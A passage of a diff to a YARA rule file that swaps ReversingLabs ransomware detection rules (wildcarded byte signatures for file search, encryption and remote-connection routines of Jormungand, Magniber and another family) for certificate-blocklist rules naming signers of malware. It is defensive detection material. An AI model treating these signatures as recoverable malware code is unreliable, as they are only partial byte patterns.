?? 8D 04 33 89 - 04 24 E8 ?? ?? ?? ?? 89 DF 8B 17 83 C7 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? - ?? 74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 88 C1 00 C1 83 DF ?? 29 DF 8B 75 - } - $remote_connection_p2 = { - 89 34 24 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 29 F9 39 C1 0F 8D ?? ?? ?? ?? 8D 04 3B 83 F9 - ?? 0F 83 ?? ?? ?? ?? 85 C9 74 ?? 8A 16 88 10 F6 C1 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? - ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 01 D8 89 04 24 E8 ?? ?? ?? ?? - 89 5C 24 ?? 8B 44 24 ?? 8B 00 89 04 24 E8 ?? ?? ?? ?? 8B 6D ?? 85 ED 74 ?? 8D 44 24 - ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 44 24 ?? 8B 44 24 ?? 83 F8 ?? - 0F 82 ?? ?? ?? ?? C7 44 03 ?? ?? ?? ?? ?? 8D 48 ?? C1 E9 ?? 89 DF B8 ?? ?? ?? ?? F3 - AB E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 90 8D 74 26 ?? - 8D 40 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 10 89 54 24 ?? 8B 50 ?? 89 54 24 ?? 8B 40 ?? 89 - 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 - DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ?? A9 - } - $remote_connection_p3 = { - 75 ?? C1 E8 ?? 83 C2 ?? 88 C1 00 C1 83 DA ?? 29 DA 8D 3C 13 B8 ?? ?? ?? ?? 29 D0 E9 - ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 29 F8 89 44 24 ?? 89 - 74 24 ?? 01 DF 89 3C 24 E8 ?? ?? ?? ?? 89 D8 8B 08 83 C0 ?? 8D 91 ?? ?? ?? ?? F7 D1 - 21 CA 81 E2 ?? ?? ?? ?? 74 ?? F7 C2 ?? ?? ?? ?? 75 ?? C1 EA ?? 83 C0 ?? 88 D1 00 D1 - 83 D8 ?? 29 D8 BA ?? ?? ?? ?? 29 C2 E9 ?? ?? ?? ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ?? - 8B 16 89 10 8B 54 0E ?? 89 54 08 ?? 8D 78 ?? 83 E7 ?? 29 F8 29 C6 01 C1 C1 E9 ?? F3 - A5 E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 89 54 24 ?? 8D 46 ?? 89 - 04 24 E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ?? - ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 8B 54 24 ?? 29 C2 89 D5 E9 ?? ?? - ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 8B 44 24 ?? 66 C7 44 03 ?? ?? ?? E9 - ?? ?? ?? ?? 66 8B 54 0E ?? 66 89 54 08 ?? E9 ?? ?? ?? ?? 90 8B 54 24 ?? 8B 44 24 ?? - E9 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="02:96:cf:33:14:f4:34:c5:b7:4d:0c:3e:36:61:6d:d1" and 1474934400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Jormungand : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_045D57D63E13775C8F812E1864797F5A : INFO FILE { meta: - description = "Yara rule that detects Jormungand ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "418c3d9f-2338-593f-a8ec-a1e25afa50d4" - date = "2021-10-22" - modified = "2021-10-22" + id = "c2c37ddc-51bc-58da-b770-df97aebca01d" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Jormungand.yara#L1-L135" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "049eb4533b37d8d72e50dd1e803a897758386643770d47b3e7690f58e44d5236" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13602-L13618" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d3e61e9a43f5b17ebb08b71dc39648d1f20273a18214f39605f365f9f0f72c10" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Jormungand" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $drop_ransom_note = { - 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC - ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? - ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 - 84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 54 24 ?? 89 14 24 8B 94 24 ?? ?? ?? ?? - 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? - 8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24 - ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24 - ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 89 - 5C 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? C7 44 24 ?? - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? - 8D 4C 24 ?? 89 0C 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C - 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 4C 24 ?? 8D - 44 24 ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? - ?? ?? 8B 44 24 ?? 8B 4C 24 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? E8 ?? ?? - ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? - 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? - 81 C4 ?? ?? ?? ?? C3 E8 - } - $encrypt_files_aes = { - 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 44 24 - ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 - ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 4C 24 ?? 8B 50 ?? - 89 0C 24 FF D2 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ?? - 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 - ?? 8B 54 24 ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 8D 1D ?? ?? ?? ?? 89 5C 24 ?? C7 44 - 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 89 - 1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B - 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 54 24 ?? - 89 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 - ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? - 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? - 89 2C 24 FF D3 8B 05 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 - 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 44 24 ?? 89 - 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 C4 ?? C3 E8 - } - $encrypt_files_rsa = { - 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24 - ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B - 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 50 ?? 8B 40 ?? 89 0C 24 89 54 24 ?? 89 - 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 75 ?? - 8D 15 ?? ?? ?? ?? 39 D0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 04 - 24 89 54 24 ?? 89 4C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 - ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C - 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 83 C4 ?? C3 C7 44 - 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 5C - 24 ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C7 40 ?? ?? - ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8D 0D ?? ?? ?? ?? 89 08 C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? 89 - 44 24 ?? 83 C4 ?? C3 89 44 24 ?? 89 04 24 8D 0D ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ?? ?? - ?? 8B 44 24 ?? EB ?? 89 04 24 89 54 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? - ?? 0F 0B - } - $find_files = { - 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 44 24 - ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? - ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 44 24 ?? 89 04 24 8B 44 24 ?? 89 44 - 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? - ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? - ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 90 E8 ?? ?? ?? ?? 83 - C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 E8 - } - $remote_connection_p1 = { - 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? C7 04 24 - ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D - 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ?? - 8D 0D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? C6 40 ?? ?? 8B 0D ?? ?? ?? ?? - 8B 54 24 ?? 8D 5A ?? 85 C9 0F 85 ?? ?? ?? ?? 89 42 ?? 8D 05 ?? ?? ?? ?? 89 04 24 E8 - ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8D 0D - ?? ?? ?? ?? 89 08 8B 0D ?? ?? ?? ?? 8D 50 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 89 - 48 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B - 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 - ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 - 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? - 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ?? - ?? 8B 4C 24 ?? 89 08 C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 - } - $remote_connection_p2 = { - C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 4C 24 - ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 4C - 24 ?? 89 44 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 05 ?? ?? ?? - ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C - 24 ?? 8B 54 24 ?? 89 0C 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24 - ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 89 0C - 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 - 8B 48 ?? 84 01 8B 40 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 41 ?? 89 44 24 ?? E8 ?? - ?? ?? ?? 85 C0 75 ?? EB ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8B 4C 24 ?? 89 4C - 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? E9 ?? ?? ?? ?? 89 14 24 8B 44 24 ?? 89 44 24 ?? E8 - ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 90 E8 - ?? ?? ?? ?? 83 C4 ?? C3 E8 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_*)) and ( all of ($remote_connection_p*)) and ($drop_ransom_note) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Mei" and pe.signatures[i].serial=="04:5d:57:d6:3e:13:77:5c:8f:81:2e:18:64:79:7f:5a" and 1485043200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Magniber : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6D633Df9Bb6015Fc3Ecea99Dff309Ee7 : INFO FILE { meta: - description = "Yara rule that detects Magniber ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "07b6c938-aa25-5ff6-95d2-9e0f84c41b41" - date = "2020-07-15" - modified = "2020-07-15" + id = "b85bf9c5-f438-5973-83ab-926e44cf2298" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Magniber.yara#L1-L114" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "05b516f9b466489ea3a30e2fe5eb08290e85ece7a63e29e8bbbeb81c87d0a6f1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13620-L13636" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "84e2f427ee79b47db8d0e5f1e2217a7e1c1ea64047e01b4ea6db69f529501f36" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Magniber" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection = { - E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 - ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF - 15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D - 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? - 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 6A - ?? 8D 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ?? - 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? - ?? 8B 55 ?? 83 C2 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D - ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 EB ?? - C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? - ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 - } - $encrypt_files_1 = { - 55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? - ?? ?? ?? 89 45 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 03 55 ?? 8D 44 12 - ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? EB - ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 7D ?? 8B 45 ?? 8B 4D ?? 8B 55 ?? 8B - 75 ?? 66 8B 14 56 66 89 14 41 EB ?? B8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 66 89 04 4A C7 - 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 7D ?? 8B 55 ?? - 03 55 ?? 8B 45 ?? 8B 4D ?? 8B 75 ?? 66 8B 0C 4E 66 89 4C 50 ?? EB ?? 8B 55 ?? 03 55 - ?? 33 C0 8B 4D ?? 66 89 44 51 ?? 8D 55 ?? 52 8D 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 8B - } - $encrypt_files_2 = { - 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? - ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 - 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 - 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 - ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 - ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 4D ?? 51 6A ?? - 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 99 8B 4D ?? - 2B 4D ?? 8B 75 ?? 1B 75 ?? 89 45 ?? 89 55 ?? 89 4D ?? 89 75 ?? 8B 55 ?? 3B 55 ?? 7C - ?? 7F ?? 8B 45 ?? 3B 45 ?? 76 ?? 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55 - ?? EB ?? 8B 45 ?? 99 89 45 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B - } - $encrypt_files_3 = { - 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 83 7D ?? - ?? 75 ?? E9 ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 73 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55 - ?? 8B 45 ?? 50 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? - ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 - 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 - ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? EB ?? - E9 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? - 74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? - 83 7D ?? ?? 74 ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? 7F ?? 8B 4D ?? 3B 4D ?? - 76 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? - 8B 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? - 83 C4 ?? B8 ?? ?? ?? ?? EB - } - $search_files = { - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 8B 4D ?? 8B 94 - 8D ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 33 C0 E9 ?? ?? ?? - ?? EB ?? 8B 4D 